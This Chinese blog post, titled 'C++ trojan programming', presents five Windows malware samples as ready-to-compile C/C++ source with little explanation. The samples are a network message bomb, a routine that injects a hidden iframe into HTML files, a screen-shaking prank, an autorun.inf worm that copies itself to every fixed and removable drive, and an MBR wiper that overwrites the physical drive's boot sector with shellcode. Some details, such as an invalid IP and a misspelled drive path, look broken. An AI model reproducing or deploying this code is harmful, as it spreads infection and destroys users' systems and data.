c++木马编程

最新推荐文章于 2024-07-15 21:16:08 发布

yunshouhu

最新推荐文章于 2024-07-15 21:16:08 发布

阅读量4k

点赞数 5

分类专栏： c/c++

c/c++ 专栏收录该内容

364 篇文章 15 订阅

订阅专栏

1、消息炸弹

#define UNICODE 
#define _UNICODE 
#include <stdio.h> 
#include <tchar.h> 
#include <windows.h> 
#include <Lm.h> 
//消息炸弹
#pragma comment(lib, "Netapi32.lib") // 加载Netapi32.lib库 


void main(int argc, wchar_t *argv[]) 
{ 	
	TCHAR *DesIp = _TEXT("1210.36.16.167"); 
	
	TCHAR *SouIp = _TEXT("255.255.255.255"); 
	
	TCHAR *Msg = _TEXT("Fuck All MM"); 
	
	int nRet = NetMessageBufferSend(NULL, DesIp, SouIp, (LPBYTE)Msg, sizeof(Msg)); 
	
	if (nRet != NERR_Success) 		
	{ 
		
		printf("Error\n"); 		
	} else{
		printf("success\n");
	}
	getchar();
	
}

2、网页感染

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
bool inject(char *filepath)
{
	char url[]="\r\n<iframe src=http://www.baidu.com/ width=0 height=0></iframe>";
	FILE *fp;
	fp=fopen(filepath,"rb+");
	if(fp==NULL)
	{
		return false;
	}
	fseek(fp,0,SEEK_END);
	fwrite(url,sizeof(char),strlen(url),fp);
	fclose(fp);
	return true;
}
void setColor(unsigned short ForeColor=3,unsigned short BackGroundColor=0) 
//给参数默认值
{ 
	HANDLE hCon = GetStdHandle(STD_OUTPUT_HANDLE); //
	SetConsoleTextAttribute(hCon,ForeColor|BackGroundColor); 	
}
void OutPutDebugInfo(char *s,int level=0)
{
	switch (level)
	{
	case 0:
		setColor(7,0);//白色
		printf("%s",s);
		break;
	case 1:
		setColor(FOREGROUND_GREEN,0);;//绿色
		printf("%s",s);
		break;
	case 2:
		setColor(6,0);//黄色
		printf("%s",s);
		break;
	case 3:
		setColor(FOREGROUND_RED,0);//红色
		printf("%s",s);
		break;
	default:
		setColor(7,0);//白色
		printf("%s",s);
		break;

	}
}
int main(int argc, char* argv[]) 
{ 	
	if(!inject("c:\\test.htm")) 		
	{ 		
		OutPutDebugInfo("Inject Error\n",3); 
		
	}else 		
	{ 		
		OutPutDebugInfo("Inject success\n"); 		
	} 	
	//OutPutDebugInfo("Inject success\n");
	getchar();
	return 0; 
	
}

3、闪屏特效

//闪屏特效
#include <stdio.h>
#include <windows.h>
void flashWindow()
{

	HWND handle=GetForegroundWindow();
	for(int i=0;i<15;i++)
	{
		RECT rc;
		GetWindowRect(handle,&rc);
		MoveWindow(handle,rc.left+8,rc.top+8,rc.right-rc.left,rc.bottom-rc.top,1);
		Sleep(40);
		MoveWindow(handle,rc.left,rc.top,rc.right-rc.left,rc.bottom-rc.top,1);
		Sleep(40);
		Beep(0x0fff,10);//配音
	}

}
void main()
{
	flashWindow();
	getchar();
}

4、磁盘感染

#include <windows.h>
#include <stdio.h>
//磁盘感染
void WriteIni(char* path)
{

	char inifilePath[MAX_PATH];
	strcpy(inifilePath,path);
	strcat(inifilePath,"\\autorun.inf");
	WritePrivateProfileString("AutoRun","open","AutoRun.exe",inifilePath);//写入INI
	WritePrivateProfileString("AutoRun","shell\\open","Open(&0)",inifilePath);//写入INI
	WritePrivateProfileString("AutoRun","shell\\open\\Command","AutoRun.exe",inifilePath);

	SetFileAttributes(inifilePath,FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_HIDDEN);

}
void InjectAllDisk()
{

	for(char i='A';i<'Z';i++)
	{

		char x[20]={i,':'};
		UINT type=GetDriveType(x);
		if(type==DRIVE_FIXED||type==DRIVE_REMOVABLE)
		{

			printf("InjectAllDisk\n");
			WriteIni(x);
			char virusPath[MAX_PATH];
			char currentPath[MAX_PATH];
			GetModuleFileName(NULL,currentPath,MAX_PATH);
			sprintf(virusPath,"%s%s",x,"\\AutoRun.exe");
			CopyFile(currentPath,virusPath,TRUE);
			SetFileAttributes(virusPath,FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_READONLY);

		}

	}
}
DWORD WINAPI StartInject(LPVOID lparam)
{
	char szCmd[MAX_PATH];
	char path[MAX_PATH];
	GetModuleFileName(NULL,path,MAX_PATH);
	path[2]='\0';
	sprintf(szCmd,"explorer %s",path);
	WinExec(szCmd,SW_SHOW);
	while(TRUE)
	{

		InjectAllDisk();
		Sleep(1000*60);
	}
	return 0;


}
int main(int argc,char*argv[])
{

	HANDLE Thread=CreateThread(NULL,NULL,StartInject,NULL,NULL,NULL);
	WaitForSingleObject(Thread,INFINITE);

	return 0;
}

5、MBR炸弹

// MBR炸弹 
#include "StdAfx.h"
#include <windows.h>
#include <winioctl.h>

int killMBR();

int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{

	MessageBox(NULL,"Fuck MBR!","Fuck!",0);
	killMBR();
	return 0;
}
unsigned char scode[]="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 


int killMBR() 
{
	HANDLE hDevice;
	DWORD dwBytesWritten,dwBytesReturned;
	BYTE pMBR[512]={0};
	memcpy(pMBR,scode,sizeof(scode)-1);//重新构造MBR

	pMBR[510]=0x55;
	pMBR[511]=0xAA;
	hDevice=CreateFile("\\\\.\\PHYSICALDRIVEO",
		GENERIC_READ|GENERIC_WRITE,
		FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL,OPEN_EXISTING,0,NULL);
	if(hDevice==INVALID_HANDLE_VALUE)
	{

		return -1;
	}
	DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,
		&dwBytesReturned,NULL);
	WriteFile(hDevice,pMBR,sizeof(pMBR),&dwBytesWritten,NULL);//写入病毒内容

	DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0
		,&dwBytesReturned,NULL);
	CloseHandle(hDevice);
	ExitProcess(-1);
	return 0;
}

yunshouhu

关注

5
点赞
踩
25

收藏

觉得还不错? 一键收藏
1
评论
c++木马编程

1、消息炸弹#define UNICODE #define _UNICODE #include #include #include #include //消息炸弹#pragma comment(lib, "Netapi32.lib") // 加载Netapi32.lib库 void main(int argc, wchar_t *argv[]) { TC
复制链接

扫一扫

专栏目录